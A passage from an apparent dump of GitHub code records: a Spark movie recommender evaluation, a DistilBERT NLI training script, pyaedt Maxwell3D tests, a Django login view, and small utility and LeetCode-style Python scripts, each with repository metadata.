test):\n    hit = 0\n    all = 0\n    tui = test[user_id]\n    for item in pui:\n        if item in tui:\n            hit += 1\n    all += len(tui)\n    return (hit, all)\n\ndef Coverage(user_id, pui, train_items, test):\n    recommend_items = set()\n    all_items = set()\n    tui = test[user_id]\n    for item, rating in train_items[user_id]:\n        all_items.add(item)\n    for item in pui:\n        recommend_items.add(item)\n    return recommend_items, all_items\n\ndef Popularity(user_id, pui, item_popularity):\n    ret = 0\n    n = 0\n    for item in pui:\n        ret += np.log1p(item_popularity[item])\n        n += 1\n    return ret, 
n\n\ndef popularity(pairs):\n    popular = set()\n    for user, rating in pairs[1]:\n        popular.add(user)\n    return pairs[0], len(popular)\n\ntrain_item_users = train_rdd.map(lambda s: ('item_' + s['movieId'], [('user_' + s['userId'], s['rating'])])).reduceByKey(lambda p1, p2: p1 + p2)\n# item popularity dictionary\nitem_popularity = sc.broadcast(train_item_users.map(popularity).collectAsMap())\n\nuser_item = test_rdd.map(lambda s: ('user_' + s['userId'], ['item_' + s['movieId']])).reduceByKey(lambda p1, p2: p1 + p2)\nuser_item_hist = user_item.collectAsMap()\ntest_users = list(user_item_hist.keys())\ntest_users_items = sc.broadcast(user_item_hist)\ntrain_items = sc.broadcast(train_user_items.collectAsMap())\n\ndef eval(test_users, test_users_items, item_sims_w, train_items, item_popularity, n):\n# def eval(item_sims, train_user_items, item_popularity, test, n):\n    # user_item = test.map(lambda s: ('user_' + s['userId'], ['item_' + s['movieId']])).reduceByKey(lambda p1, p2: p1 + p2)\n    # user_item_hist = user_item.collectAsMap()\n    # test_users = list(user_item_hist.keys())\n    # test_users_items = sc.broadcast(user_item_hist)\n\n    # item_sims_w = sc.broadcast(item_sims.collectAsMap())\n\n    '''\n    Compute the top-N recommendations for each user\n    user_id -> [item1,item2,item3,...]\n    '''\n    # choose test recs: users who have browsing history\n    user_item_recs = train_user_items.filter(lambda p: p[0] in test_users).map(\n        lambda p: topNRecommendations(p[0], p[1], item_sims_w.value, n)).cache()\n    \n    # precision\n    hit, all = user_item_recs.map(lambda p: Precision(p[0], p[1], test_users_items.value, n)).reduce(lambda x, y: (x[0] + y[0], x[1] + y[1]))\n    p = hit / (all * 1.0)\n    # recall\n    hit, all = user_item_recs.map(lambda p: Recall(p[0], p[1], test_users_items.value)).reduce(lambda x, y: (x[0] + y[0], x[1] + y[1]))\n    r = hit / (all * 1.0)\n    # Coverage\n    # train_items = sc.broadcast(train_user_items.collectAsMap())\n    recommend_items, all_items = user_item_recs.map(lambda p: Coverage(p[0], p[1], train_items.value, test_users_items.value)).reduce(lambda x, y: (x[0].union(y[0]), x[1].union(y[1])))\n    c = len(recommend_items) / (len(all_items) * 1.0)\n    # popularity\n    recom_popularity, all = user_item_recs.map(lambda p: Popularity(p[0], p[1], item_popularity.value)).reduce(lambda x, y: (x[0] + y[0], x[1] + y[1]))\n    popularity = recom_popularity / (all * 1.0)\n    # del user_item_recs, user_item_hist, test_users, test_users_items, item_popularity, item_sims_w, train_items\n    del user_item_recs, test_users, test_users_items, item_popularity, item_sims_w, train_items\n    gc.collect()\n    return p, r, c, popularity\n\n# build the item similarity matrix on the training set for several neighborhood sizes\nfor k in [5, 10, 20, 40, 80, 160]:\n    # the N items most similar to each item\n    item_sims = item_sim(pairwise_items, train_item_norm_dict, k)\n    item_sims_w = sc.broadcast(item_sims.collectAsMap())\n    print('eval model start......')\n    # p, r, c, popularity = eval(item_sims_w, train_user_items, item_popularity, test_rdd, 50)\n    p, r, c, popularity = eval(test_users, test_users_items, item_sims_w, train_items, item_popularity, 50)\n    print('top %s model: %s, %s, %s, %s' % (k, p, r, c, popularity))\n    del item_sims, item_sims_w\n    gc.collect()\n\n# user_sims = user_sim(pairwise_users, train_user_norm_dict, 10)\n# p10, r10, c10, popularity10 = eval(user_sims, item_popularity, train_user_items, test_rdd, 100)\n# print('top 10 model: %s, %s, %s, %s' % (p10, r10, c10, popularity10))\n# del user_sims\n# gc.collect()\n\n# user_sims = user_sim(pairwise_users, train_user_norm_dict, 20)\n# p20, r20, c20, popularity20 = eval(user_sims, item_popularity, train_user_items, test_rdd, 100)\n# print('top 20 model: %s, %s, 
%s, %s' % (p20, r20, c20, popularity20))\n# del user_sims\n# gc.collect()\n\n# user_sims = user_sim(pairwise_users, train_user_norm_dict, 40)\n# p40, r40, c40, popularity40 = eval(user_sims, item_popularity, train_user_items, test_rdd, 100)\n# print('top 40 model: %s, %s, %s, %s' % (p40, r40, c40, popularity40 ))\n# del user_sims\n# gc.collect()\n\n# user_sims = user_sim(pairwise_users, train_user_norm_dict, 80)\n# p80, r80, c80, popularity80 = eval(user_sims, item_popularity, train_user_items, test_rdd, 100)\n# print('top 80 model: %s, %s, %s, %s' % (p80, r80, c80, popularity80))\n# del user_sims\n# gc.collect()\nprint('cost time %s min' % ((time.perf_counter() - s) / 60))","repo_name":"jhhugo/recom_sys","sub_path":"movielen/src/spark_icf.py","file_name":"spark_icf.py","file_ext":"py","file_size_in_byte":10192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"12393075584","text":"import sys\nimport numpy\n\n\n\nclass VariancePlugin:\n def input(self, filename):\n self.myfile = filename\n\n def run(self):\n filestuff = open(self.myfile, 'r')\n firstline = filestuff.readline()\n self.bacteria = firstline.split(',')\n if (self.bacteria.count('\\\"\\\"') != 0):\n self.bacteria.remove('\\\"\\\"')\n self.n = len(self.bacteria)\n self.ADJ = []\n for i in range(self.n):\n self.ADJ.append([])\n for line in filestuff:\n contents = line.split(',')\n for j in range(len(contents)-1):\n value = float(contents[j+1])\n self.ADJ[j].append(value)\n\n def output(self, filename):\n # Variance in .txt\n filestuff2 = open(filename, 'w')\n filestuff2.write(\"Element\\tVariance\\n\")\n filestuff2.write(\"\\n\")\n variances = []\n for i in range(self.n):\n sum = 0\n variance = 0\n if (len(self.ADJ[i]) != 0):\n for j in range(len(self.ADJ[i])):\n sum += self.ADJ[i][j] #* self.n # Trying Unnormalized\n average = float(sum) / len(self.ADJ[i])\n for j in range(len(self.ADJ[i])):\n variance += (average - self.ADJ[i][j])**2#*self.n) ** 2\n variances.append((variance / len(self.ADJ[i]), self.bacteria[i])) \n variances.sort()\n variances.reverse()\n for i in range(len(variances)):\n filestuff2.write(variances[i][1])\n filestuff2.write(\"\\t\")\n filestuff2.write(str(variances[i][0]))\n filestuff2.write(\"\\n\")\n\n\n","repo_name":"movingpictures83/Variance","sub_path":"VariancePlugin.py","file_name":"VariancePlugin.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"39645766732","text":"import datasets\r\ndata = datasets.load_dataset('SetFit/mnli')\r\n\r\nhf_token = \"\" # huggingface token to upload to the huggingface hub\r\nfinal_name = \"\" # what to save the model name as\r\n\r\nimport os\r\nos.environ[\"CUDA_VISIBLE_DEVICES\"]=\"0\"\r\n\r\nfrom transformers import AutoTokenizer, AutoModelForSequenceClassification, TrainingArguments, Trainer\r\n\r\nmax_input_length = 512\r\n\r\ntokenizer = AutoTokenizer.from_pretrained(\"distilbert-base-uncased\")\r\nmodel = AutoModelForSequenceClassification.from_pretrained(\"distilbert-base-uncased\", num_labels=3)\r\n\r\nspecial_tokens_dict = {'additional_special_tokens': ['<|style|>', '<|fact|>']}\r\nnum_added_toks = tokenizer.add_special_tokens(special_tokens_dict)\r\nmodel.resize_token_embeddings(len(tokenizer))\r\n\r\ndef preprocess_function(examples):\r\n inputs = [\"<|sentence1|>\" + examples['text1'][i] + \" <|sentence2|> \" + examples['text2'][i] for i in range(len(examples[\"text1\"]))]\r\n \r\n model_inputs = 
tokenizer(inputs, max_length=max_input_length, truncation=True)\r\n\r\n    # Setup the tokenizer for targets\r\n    #with tokenizer.as_target_tokenizer():\r\n    #    labels = tokenizer(examples[\"output\"], max_length=max_target_length, truncation=True)\r\n\r\n    #model_inputs[\"labels\"] = labels[\"input_ids\"]\r\n    return model_inputs\r\n\r\ntrain_tok = data['train'].map(preprocess_function, batched=True)\r\ntest_tok = data['validation'].map(preprocess_function, batched=True)\r\n\r\nfrom transformers import DataCollatorWithPadding\r\ndata_collator = DataCollatorWithPadding(tokenizer=tokenizer)\r\n\r\ntraining_args = TrainingArguments(\r\n    output_dir=\"./results\",\r\n    learning_rate=2e-5,\r\n    per_device_train_batch_size=64,\r\n    per_device_eval_batch_size=64,\r\n    num_train_epochs=3,\r\n    weight_decay=0.01,\r\n    save_strategy='no'\r\n)\r\n\r\nimport numpy as np\r\nfrom datasets import load_metric\r\nmetric = load_metric('accuracy')\r\n\r\ndef compute_metrics(eval_pred):\r\n    predictions, labels = eval_pred\r\n    predictions = np.argmax(predictions, axis=1)\r\n    return metric.compute(predictions=predictions, references=labels)\r\n\r\ntrainer = Trainer(\r\n    model=model,\r\n    args=training_args,\r\n    train_dataset=train_tok,\r\n    eval_dataset=test_tok,\r\n    tokenizer=tokenizer,\r\n    compute_metrics=compute_metrics,\r\n    data_collator=data_collator,\r\n)\r\n\r\ntrainer.train()\r\n\r\ntrainer.evaluate()\r\n\r\nfrom huggingface_hub.hf_api import HfFolder\r\nHfFolder.save_token(hf_token)\r\nmodel.push_to_hub(final_name)","repo_name":"nbalepur/expository-text-generation","sub_path":"train/train_nli.py","file_name":"train_nli.py","file_ext":"py","file_size_in_byte":2409,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"34"} +{"seq_id":"23047398934","text":"# Setup paths for module imports\nimport os\nimport tempfile\n\nfrom _unittest.conftest import BasisTest\nfrom _unittest.conftest import desktop_version\nfrom _unittest.conftest import local_path\nfrom pyaedt import Maxwell3d\nfrom pyaedt.generic.constants import SOLUTIONS\nfrom pyaedt.generic.general_methods import generate_unique_name\n\ntry:\n    import pytest\nexcept ImportError:\n    import _unittest_ironpython.conf_unittest as pytest\n\ntest_project_name = \"eddy\"\n\n\nclass TestClass(BasisTest, object):\n    def setup_class(self):\n        BasisTest.my_setup(self)\n        self.aedtapp = BasisTest.add_app(self, application=Maxwell3d, solution_type=\"EddyCurrent\")\n        core_loss_file = \"PlanarTransformer.aedt\"\n        example_project = os.path.join(local_path, \"example_models\", core_loss_file)\n        self.file_path = self.local_scratch.copyfile(example_project)\n\n    def teardown_class(self):\n        BasisTest.my_teardown(self)\n\n    def test_01_create_primitive(self):\n        self.aedtapp.modeler.model_units = \"mm\"\n\n        plate_pos = self.aedtapp.modeler.Position(0, 0, 0)\n        hole_pos = self.aedtapp.modeler.Position(18, 18, 0)\n        # Create plate with hole\n        plate = self.aedtapp.modeler.create_box(plate_pos, [294, 294, 19], name=\"Plate\")  # All positions in model units\n        hole = self.aedtapp.modeler.create_box(hole_pos, [108, 108, 19], name=\"Hole\")  # All positions in model units\n        self.aedtapp.modeler.subtract([plate], [hole])\n        plate.material_name = \"aluminum\"\n        assert plate.solve_inside\n        assert plate.material_name == \"aluminum\"\n\n    def test_02_create_coil(self):\n        center_hole = self.aedtapp.modeler.Position(119, 25, 49)\n        center_coil = self.aedtapp.modeler.Position(94, 0, 49)\n        coil_hole = self.aedtapp.modeler.create_box(\n            center_hole, [150, 150, 100], 
name=\"Coil_Hole\"\n ) # All positions in model units\n coil = self.aedtapp.modeler.create_box(\n center_coil, [200, 200, 100], name=\"Coil\"\n ) # All positions in model units\n self.aedtapp.modeler.subtract([coil], [coil_hole])\n coil.material_name = \"Copper\"\n coil.solve_inside = True\n p_coil = self.aedtapp.post.volumetric_loss(\"Coil\")\n assert type(p_coil) is str\n\n def test_03_coordinate_system(self):\n assert self.aedtapp.modeler.create_coordinate_system([200, 100, 0], mode=\"view\", view=\"XY\", name=\"Coil_CS\")\n\n def test_04_coil_terminal(self):\n self.aedtapp.modeler.section([\"Coil\"], self.aedtapp.PLANE.ZX)\n self.aedtapp.modeler.separate_bodies([\"Coil_Section1\"])\n self.aedtapp.modeler.delete(\"Coil_Section1_Separate1\")\n assert self.aedtapp.assign_current([\"Coil_Section1\"], amplitude=2472)\n self.aedtapp.solution_type = \"Magnetostatic\"\n volt = self.aedtapp.assign_voltage(self.aedtapp.modeler[\"Coil_Section1\"].faces[0].id, amplitude=1)\n cur2 = self.aedtapp.assign_current([\"Coil_Section1\"], amplitude=212)\n assert cur2\n assert cur2.delete()\n assert volt\n assert volt.delete()\n self.aedtapp.solution_type = \"EddyCurrent\"\n\n def test_05_winding(self):\n face_id = self.aedtapp.modeler[\"Coil_Section1\"].faces[0].id\n assert self.aedtapp.assign_winding(face_id)\n bounds = self.aedtapp.assign_winding(current_value=20e-3, coil_terminals=face_id)\n assert bounds\n bounds = self.aedtapp.assign_winding(current_value=\"20e-3A\", coil_terminals=face_id)\n assert bounds\n bounds = self.aedtapp.assign_winding(res=\"1ohm\", coil_terminals=face_id)\n assert bounds\n bounds = self.aedtapp.assign_winding(ind=\"1H\", coil_terminals=face_id)\n assert bounds\n bounds = self.aedtapp.assign_winding(voltage=\"10V\", coil_terminals=face_id)\n assert bounds\n bounds_name = generate_unique_name(\"Winding\")\n bounds = self.aedtapp.assign_winding(coil_terminals=face_id, name=bounds_name)\n assert bounds_name == bounds.name\n\n def test_05a_assign_coil(self):\n face_id = self.aedtapp.modeler[\"Coil_Section1\"].faces[0].id\n bound = self.aedtapp.assign_coil(input_object=face_id)\n assert bound\n polarity = \"Positive\"\n bound = self.aedtapp.assign_coil(input_object=face_id, polarity=polarity)\n assert not bound.props[\"Point out of terminal\"]\n polarity = \"Negative\"\n bound = self.aedtapp.assign_coil(input_object=face_id, polarity=polarity)\n assert bound.props[\"Point out of terminal\"]\n bound_name = generate_unique_name(\"Coil\")\n bound = self.aedtapp.assign_coil(input_object=face_id, name=bound_name)\n assert bound_name == bound.name\n\n def test_05_draw_region(self):\n assert self.aedtapp.modeler.create_air_region(*[300] * 6)\n\n def test_06_eddycurrent(self):\n assert self.aedtapp.eddy_effects_on([\"Plate\"], activate_eddy_effects=True)\n oModule = self.aedtapp.odesign.GetModule(\"BoundarySetup\")\n assert oModule.GetEddyEffect(\"Plate\")\n assert oModule.GetDisplacementCurrent(\"Plate\")\n self.aedtapp.eddy_effects_on([\"Plate\"], activate_eddy_effects=False)\n assert not oModule.GetEddyEffect(\"Plate\")\n assert not oModule.GetDisplacementCurrent(\"Plate\")\n\n def test_07a_setup(self):\n adaptive_frequency = \"200Hz\"\n Setup = self.aedtapp.create_setup()\n Setup.props[\"MaximumPasses\"] = 12\n Setup.props[\"MinimumPasses\"] = 2\n Setup.props[\"MinimumConvergedPasses\"] = 1\n Setup.props[\"PercentRefinement\"] = 30\n Setup.props[\"Frequency\"] = adaptive_frequency\n dc_freq = 0.1\n stop_freq = 10\n count = 1\n assert Setup.add_eddy_current_sweep(\"LinearStep\", 
dc_freq, stop_freq, count, clear=True)\n        assert isinstance(Setup.props[\"SweepRanges\"][\"Subrange\"], dict)\n        assert Setup.add_eddy_current_sweep(\"LinearCount\", dc_freq, stop_freq, count, clear=False)\n        assert isinstance(Setup.props[\"SweepRanges\"][\"Subrange\"], list)\n\n        assert Setup.update()\n        assert Setup.enable_expression_cache([\"CoreLoss\"], \"Fields\", \"Phase='0deg' \", True)\n        assert Setup.disable()\n        assert Setup.enable()\n        assert self.aedtapp.setup_ctrlprog(Setup.name)\n\n    def test_07b_create_parametrics(self):\n        self.aedtapp[\"w1\"] = \"10mm\"\n        self.aedtapp[\"w2\"] = \"2mm\"\n        setup1 = self.aedtapp.parametrics.add(\"w1\", 0.1, 20, 0.2, \"LinearStep\")\n        assert setup1\n        expression = \"re(FluxLinkage(\" + self.aedtapp.excitations[2] + \"))\"\n        assert setup1.add_calculation(\n            calculation=expression,\n            ranges={\"Freq\": \"200Hz\"},\n            report_type=\"EddyCurrent\",\n            solution=self.aedtapp.existing_analysis_sweeps[0],\n        )\n\n    def test_08_setup_ctrlprog_with_file(self):\n        transient_setup = self.aedtapp.create_setup()\n        transient_setup.props[\"MaximumPasses\"] = 12\n        transient_setup.props[\"MinimumPasses\"] = 2\n        transient_setup.props[\"MinimumConvergedPasses\"] = 1\n        transient_setup.props[\"PercentRefinement\"] = 30\n        transient_setup.props[\"Frequency\"] = \"200Hz\"\n        transient_setup.update()\n        transient_setup.enable_expression_cache([\"CoreLoss\"], \"Fields\", \"Phase='0deg' \", True)\n\n        # Test the creation of the control program file\n        with tempfile.TemporaryFile(\"w+\") as fp:\n            assert self.aedtapp.setup_ctrlprog(transient_setup.name, file_str=fp.name)\n\n    def test_22_create_length_mesh(self):\n        assert self.aedtapp.mesh.assign_length_mesh([\"Plate\"])\n\n    def test_23_create_skin_depth(self):\n        assert self.aedtapp.mesh.assign_skin_depth([\"Plate\"], \"1mm\")\n\n    def test_24_create_curvilinear(self):\n        assert self.aedtapp.mesh.assign_curvilinear_elements([\"Coil\"], \"1mm\")\n\n    def test_24_create_edge_cut(self):\n        assert self.aedtapp.mesh.assign_edge_cut([\"Coil\"])\n\n    def test_24_density_control(self):\n        assert self.aedtapp.mesh.assign_density_control([\"Coil\"], maxelementlength=\"2mm\", layerNum=\"3\")\n\n    def test_24_rotational_layer(self):\n        assert self.aedtapp.mesh.assign_rotational_layer([\"Coil\"])\n\n    def test_25_assign_initial_mesh(self):\n        assert self.aedtapp.mesh.assign_initial_mesh_from_slider(4)\n\n    def test_26_create_udp(self):\n        my_udpPairs = []\n        mypair = [\"DiaGap\", \"102mm\"]\n        my_udpPairs.append(mypair)\n        mypair = [\"Length\", \"100mm\"]\n        my_udpPairs.append(mypair)\n        mypair = [\"Poles\", \"8\"]\n        my_udpPairs.append(mypair)\n        mypair = [\"EmbraceTip\", \"0.29999999999999999\"]\n        my_udpPairs.append(mypair)\n        mypair = [\"EmbraceRoot\", \"1.2\"]\n        my_udpPairs.append(mypair)\n        mypair = [\"ThickTip\", \"5mm\"]\n        my_udpPairs.append(mypair)\n        mypair = [\"ThickRoot\", \"10mm\"]\n        my_udpPairs.append(mypair)\n        mypair = [\"ThickShoe\", \"8mm\"]\n        my_udpPairs.append(mypair)\n        mypair = [\"DepthSlot\", \"12mm\"]\n        my_udpPairs.append(mypair)\n        mypair = [\"ThickYoke\", \"10mm\"]\n        my_udpPairs.append(mypair)\n        mypair = [\"LengthPole\", \"90mm\"]\n        my_udpPairs.append(mypair)\n        mypair = [\"LengthMag\", \"0mm\"]\n        my_udpPairs.append(mypair)\n        mypair = [\"SegAngle\", \"5deg\"]\n        my_udpPairs.append(mypair)\n        mypair = [\"LenRegion\", \"200mm\"]\n        my_udpPairs.append(mypair)\n        mypair = [\"InfoCore\", \"0\"]\n        my_udpPairs.append(mypair)\n\n        # Test udp with a custom name.\n        my_udpName = \"MyClawPoleCore\"\n        udp = self.aedtapp.modeler.create_udp(\n            
udp_dll_name=\"RMxprt/ClawPoleCore\",\n udp_parameters_list=my_udpPairs,\n upd_library=\"syslib\",\n name=my_udpName,\n udp_type=\"Solid\",\n )\n\n assert udp\n assert udp.name == \"MyClawPoleCore\"\n assert \"MyClawPoleCore\" in udp._primitives.object_names\n assert int(udp.bounding_dimension[2]) == 100\n\n # Modify one of the 'MyClawPoleCore' udp properties.\n assert self.aedtapp.modeler.update_udp(\n object_name=\"MyClawPoleCore\",\n operation_name=\"CreateUserDefinedPart\",\n udp_parameters_list=[[\"Length\", \"110mm\"]],\n )\n\n assert int(udp.bounding_dimension[0]) == 102\n assert int(udp.bounding_dimension[1]) == 102\n assert int(udp.bounding_dimension[2]) == 110\n\n # Test udp with default name -None-.\n second_udp = self.aedtapp.modeler.create_udp(\n udp_dll_name=\"RMxprt/ClawPoleCore\",\n udp_parameters_list=my_udpPairs,\n upd_library=\"syslib\",\n udp_type=\"Solid\",\n )\n\n assert second_udp\n assert second_udp.name == \"ClawPoleCore\"\n assert \"ClawPoleCore\" in udp._primitives.object_names\n\n # Modify two of the 'MyClawPoleCore' udp properties.\n assert self.aedtapp.modeler.update_udp(\n object_name=\"ClawPoleCore\",\n operation_name=\"CreateUserDefinedPart\",\n udp_parameters_list=[[\"Length\", \"110mm\"], [\"DiaGap\", \"125mm\"]],\n )\n\n assert int(second_udp.bounding_dimension[0]) == 125\n assert int(second_udp.bounding_dimension[1]) == 125\n assert int(second_udp.bounding_dimension[2]) == 110\n\n @pytest.mark.skipif(os.name == \"posix\", reason=\"Feature not supported in Linux\")\n def test_27_create_udm(self):\n my_udmPairs = []\n mypair = [\"ILD Thickness (ILD)\", \"0.006mm\"]\n my_udmPairs.append(mypair)\n mypair = [\"Line Spacing (LS)\", \"0.004mm\"]\n my_udmPairs.append(mypair)\n mypair = [\"Line Thickness (LT)\", \"0.005mm\"]\n my_udmPairs.append(mypair)\n mypair = [\"Line Width (LW)\", \"0.004mm\"]\n my_udmPairs.append(mypair)\n mypair = [\"No. 
of Turns (N)\", 2]\n my_udmPairs.append(mypair)\n mypair = [\"Outer Diameter (OD)\", \"0.15mm\"]\n my_udmPairs.append(mypair)\n mypair = [\"Substrate Thickness\", \"0.2mm\"]\n my_udmPairs.append(mypair)\n mypair = [\n \"Inductor Type\",\n '\"Square,Square,Octagonal,Circular,Square-Differential,Octagonal-Differential,Circular-Differential\"',\n ]\n my_udmPairs.append(mypair)\n mypair = [\"Underpass Thickness (UT)\", \"0.001mm\"]\n my_udmPairs.append(mypair)\n mypair = [\"Via Thickness (VT)\", \"0.001mm\"]\n my_udmPairs.append(mypair)\n\n assert self.aedtapp.modeler.create_udm(\n udmfullname=\"Maxwell3D/OnDieSpiralInductor.py\", udm_params_list=my_udmPairs, udm_library=\"syslib\"\n )\n\n def test_28_assign_torque(self):\n assert self.aedtapp.assign_torque(\"Coil\")\n\n def test_29_assign_force(self):\n assert self.aedtapp.assign_force(\"Coil\")\n\n def test_30_assign_movement(self):\n self.aedtapp.insert_design(\"Motion\")\n self.aedtapp.solution_type = SOLUTIONS.Maxwell3d.Transient\n self.aedtapp.modeler.create_box([0, 0, 0], [10, 10, 10], name=\"Inner_Box\")\n self.aedtapp.modeler.create_box([0, 0, 0], [30, 20, 20], name=\"Outer_Box\")\n bound = self.aedtapp.assign_translate_motion(\"Outer_Box\", mechanical_transient=True, velocity=1)\n assert bound\n assert bound.props[\"Velocity\"] == \"1m_per_sec\"\n\n def test_31_core_losses(self):\n\n m3d1 = Maxwell3d(self.file_path, specified_version=desktop_version)\n assert m3d1.set_core_losses([\"PQ_Core_Bottom\", \"PQ_Core_Top\"])\n assert m3d1.set_core_losses([\"PQ_Core_Bottom\"], False)\n self.aedtapp.close_project(m3d1.project_name, False)\n\n def test_32_matrix(self):\n m3d = Maxwell3d(self.file_path, specified_version=desktop_version)\n m3d.solution_type = SOLUTIONS.Maxwell3d.ElectroStatic\n m3d.modeler.primitives.create_box([0, 1.5, 0], [1, 2.5, 5], name=\"Coil_1\", matname=\"aluminum\")\n m3d.modeler.primitives.create_box([8.5, 1.5, 0], [1, 2.5, 5], name=\"Coil_2\", matname=\"aluminum\")\n m3d.modeler.primitives.create_box([16, 1.5, 0], [1, 2.5, 5], name=\"Coil_3\", matname=\"aluminum\")\n m3d.modeler.primitives.create_box([32, 1.5, 0], [1, 2.5, 5], name=\"Coil_4\", matname=\"aluminum\")\n\n rectangle1 = m3d.modeler.primitives.create_rectangle(0, [0.5, 1.5, 0], [2.5, 5], name=\"Sheet1\")\n rectangle2 = m3d.modeler.primitives.create_rectangle(0, [9, 1.5, 0], [2.5, 5], name=\"Sheet2\")\n rectangle3 = m3d.modeler.primitives.create_rectangle(0, [16.5, 1.5, 0], [2.5, 5], name=\"Sheet3\")\n rectangle4 = m3d.modeler.primitives.create_rectangle(0, [32.5, 1.5, 0], [2.5, 5], name=\"Sheet4\")\n\n m3d.assign_voltage(rectangle1.faces[0], amplitude=1, name=\"Voltage1\")\n m3d.assign_voltage(rectangle2.faces[0], amplitude=1, name=\"Voltage2\")\n m3d.assign_voltage(rectangle3.faces[0], amplitude=1, name=\"Voltage3\")\n m3d.assign_voltage(rectangle4.faces[0], amplitude=1, name=\"Voltage4\")\n\n L = m3d.assign_matrix(sources=\"Voltage1\")\n assert L.props[\"MatrixEntry\"][\"MatrixEntry\"][0][\"Source\"] == \"Voltage1\"\n assert L.delete()\n group_sources = \"Voltage2\"\n L = m3d.assign_matrix(sources=[\"Voltage1\", \"Voltage3\"], matrix_name=\"Test1\", group_sources=group_sources)\n assert L.props[\"MatrixEntry\"][\"MatrixEntry\"][1][\"Source\"] == \"Voltage3\"\n m3d.solution_type = SOLUTIONS.Maxwell3d.Transient\n winding1 = m3d.assign_winding(\"Sheet1\", name=\"Current1\")\n winding2 = m3d.assign_winding(\"Sheet2\", name=\"Current2\")\n winding3 = m3d.assign_winding(\"Sheet3\", name=\"Current3\")\n winding4 = m3d.assign_winding(\"Sheet4\", 
name=\"Current4\")\n L = m3d.assign_matrix(sources=\"Current1\")\n assert not L\n self.aedtapp.close_project(m3d.project_name, False)\n\n def test_33_mesh_settings(self):\n assert self.aedtapp.mesh.initial_mesh_settings\n assert self.aedtapp.mesh.initial_mesh_settings.props\n\n def test_34_assign_voltage_drop(self):\n circle = self.aedtapp.modeler.create_circle(position=[10, 10, 0], radius=5, cs_plane=\"XY\")\n self.aedtapp.solution_type = \"Magnetostatic\"\n assert self.aedtapp.assign_voltage_drop([circle.faces[0]])\n","repo_name":"pvinodk143/working_phase1","sub_path":"_unittest/test_28_Maxwell3D.py","file_name":"test_28_Maxwell3D.py","file_ext":"py","file_size_in_byte":16078,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"9953218645","text":"import numpy as np\nimport re\ninfile = open('../data/5-gram-yao.txt',\"r\", encoding=\"utf-8\")\noutfile = open('../input_data/yao.txt',\"w\", encoding=\"utf-8\")\nf = infile.readlines()\n\nfor line in f :\n line = line.replace(\"f_node_name\",\"'f_node_name'\").replace(\"f_node_label\", \"'f_node_label'\")\\\n .replace(\"relation_name\", \"'relation_name'\").replace(\"l_node_name\", \"'l_node_name'\")\\\n .replace('\"', \"'\").replace(\"/[1-9][0-9]*/\",\"\").replace(\": Tuples \", \"\")\n # rule = \"\\d\"\n new_line = re.sub('[\\d]', '', line)\n\n # line = line.split(\"{\", 1)\n # # del(line[0])\n\n print(new_line)\n outfile.write(str(new_line))","repo_name":"LinJingOK/dataFromJson","sub_path":"Neo4j/code/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"70359893539","text":"from django.http import HttpResponse,HttpResponseRedirect\nfrom django.template import loader\nfrom django.contrib.auth import authenticate, login, logout\n\ndef login_view(request):\n template = loader.get_template('base.html')\n context={'app_name':'login'}\n if request.user.is_authenticated():\n return HttpResponseRedirect('/app/')\n elif request.method == 'POST':\n user=authenticate(username=request.POST['uname'],password=request.POST['passwd'])\n if user is not None:\n login(request,user)\n return HttpResponseRedirect('/app/')\n else:\n context['args']='{failedLogin:true,}'\n return HttpResponse(template.render(context, request))\n else:\n context['args']='{failedLogin:false,}'\n return HttpResponse(template.render(context, request))\n\ndef logout_view(request):\n logout(request)\n return HttpResponseRedirect('/login/')\n","repo_name":"emorthen/interlecture","sub_path":"interlecture/login/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"22154383449","text":"from typing import List\n\n\ndef search_and_mark(row, col, grid):\n\n queue = [(row, col)]\n directions = [\n (0, 1), (1, 0), (0, -1), (-1, 0)\n ]\n while queue:\n r, c = queue.pop()\n if grid[r][c] == \"X\":\n grid[r][c] = \".\"\n for dir in directions:\n new_r, new_c = r + dir[0], c + dir[1]\n if new_r < 0 or new_r >= len(grid):\n continue\n if new_c < 0 or new_c >= len(grid[0]):\n continue\n if grid[new_r][new_c] == \"X\":\n queue.append((new_r, new_c))\n\n\nclass Solution:\n def countBattleships(self, board: List[List[str]]) -> int:\n count = 0\n for row in range(len(board)):\n for col in range(len(board[0])):\n if board[row][col] == \"X\":\n count += 1\n search_and_mark(row, col, 
board)\n        return count\n","repo_name":"EdmundMartin/LeetcodeProjectAmerica","sub_path":"medium/419_battleships_in_a_board.py","file_name":"419_battleships_in_a_board.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"73412194978","text":"# Version solved using the pseudocode from the problem\nn = int(input())\n\ndef rec(n):\n    fib = [0] * (n + 1)\n    fib[1] = 1\n    fib[2] = 1\n    for i in range(3, n + 1):\n        fib[i] = fib[i - 2] + fib[i - 1]\n    return fib[n]\n\ndef dp(n):\n    fib = [0] * (n + 1)\n    fib[1] = 1\n    fib[2] = 1\n    count = 0\n    for i in range(3, n + 1):\n        count += 1\n        fib[i] = fib[i - 2] + fib[i - 1]\n    return count\n\nprint(rec(n), dp(n))\n\n# Short version\nn = int(input())\ndp = [0, 1, 1]\nfor i in range(3, n + 1):\n    dp.append(dp[i - 2] + dp[i - 1])\nprint(dp[n], n - 2)\n","repo_name":"vichye-1/Algorithm","sub_path":"Python/BOJ/20000/24416_알고리즘 수업 - 피보나치 수 1.py","file_name":"24416_알고리즘 수업 - 피보나치 수 1.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"33960271504","text":"import sys\nfrom tmdb_dal import update_movie_runtime\nfrom errors import invalid_movieID_argument, invalid_runtime_argument, invalid_runtime_syntax\nif len(sys.argv) != 3:\n    raise Exception(invalid_runtime_syntax)\n\ntry:\n    movieId = sys.argv[1]\n    runtime = int(sys.argv[2])\nexcept 